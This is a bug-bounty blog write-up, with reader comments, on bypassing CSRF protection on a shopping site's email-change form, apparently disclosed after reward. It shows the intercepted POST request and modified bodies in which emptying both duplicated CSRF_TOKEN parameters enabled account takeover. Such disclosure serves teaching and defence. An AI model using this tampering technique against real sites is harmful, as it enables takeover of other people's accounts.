Categories
Uncategorized

Account takeover CSRF Misconfiguration

What is CSRF?

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

Case Study

As this was a private program all illustrations of vulnerabilities will be represented with the host as example.com

Since this site was a shopping site. I started playing with price param to get things for free but failed. The program was 2 years old i thought that my account section might not be vulnerable as the site already had around 100 reports. But lets test under my account page their is a option to change Email-id without entering password looks nice to me because it can end up with account takeover using CSRF, but as soon as i intercepted the request i observed that in the post request is has a CSRF protection.

POST /customer/account/edit/ HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: /
Accept-Language: en-US,en;q=0.5
Referer: https://www.examplecom.au/customer/account/details/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 262
Connection: close
Cookie:

CSRF_TOKEN=e7a943c34fdfgffaf90e69f464401aa276f&EditForm%5Bfirst_name%5D=33&EditForm%5Blast_name%5D=41241&EditForm%5Bgender%5D=male&EditForm%5Bbirthday%5D=&EditForm%5Bemail%5D=test.123%40gmail.com&CSRF_TOKEN=e7a943c34fe5dd8b177faf90e69f464401aa276f

So i started testing for CSRF i removed the CSRF token, something like

CSRF_TOKEN=e7a943c3dfgdfd8b177faf90e69f464401aa276f&EditForm%5Bfirst_name%5D=33&EditForm%5Blast_name%5D=41241&EditForm%5Bgender%5D=male&EditForm%5Bbirthday%5D=&EditForm%5Bemail%5D=test.123%40gmail.com&CSRF_TOKEN=

tried but ended up with error. Next thing to do remove CSRF_TOKEN completely looks something like this

CSRF_TOKEN=e7a943cgfsfgh177faf90e69f464401aa276f&EditForm%5Bfirst_name%5D=33&EditForm%5Blast_name%5D=41241&EditForm%5Bgender%5D=male&EditForm%5Bbirthday%5D=&EditForm%5Bemail%5D=test.123%40gmail.com

again ended up error. After 10 mins of testing i found that CSRF_TOKEN is send 2 times in the request

CSRF_TOKEN=e7a943c34fdfgfdg77faf90e69f464401aa276f&EditForm%5Bfirst_name%5D=33&EditForm%5Blast_name%5D=41241&EditForm%5Bgender%5D=male&EditForm%5Bbirthday%5D=&EditForm%5Bemail%5D=test.123%40gmail.com&CSRF_TOKEN=e7a943c34fe5dd8b177faf90e69f464401aa276f

I removed both the CSRF_TOKEN, POST request like

CSRF_TOKEN=&EditForm%5Bfirst_name%5D=33&EditForm%5Blast_name%5D=41241&EditForm%5Bgender%5D=male&EditForm%5Bbirthday%5D=&EditForm%5Bemail%5D=test.123%40gmail.com&CSRF_TOKEN=

And I was able to takeover anyone’s account

Reported: 12 march 2020
Responded: 15 march 2020
Rewarded: $XXX 24 April 2020

3 replies on “Account takeover CSRF Misconfiguration”

Hi Wisdomfreak,

JJust for my understanding when you you wrote “I removed both the CSRF_TOKEN, POST
POST information is 7a943c34fdfgfdg77faf90e69f464401aa276f isn’t it ?

I can to try, i would like to start Bugbounty and I can to learn.

in the post request as mentioned their are two CSRF_TOKEN parameters in the beginning of the POST body and at the End of the POST body. To make it work i need to removed both the CSRF_TOKEN.

Leave a Reply

Your email address will not be published. Required fields are marked *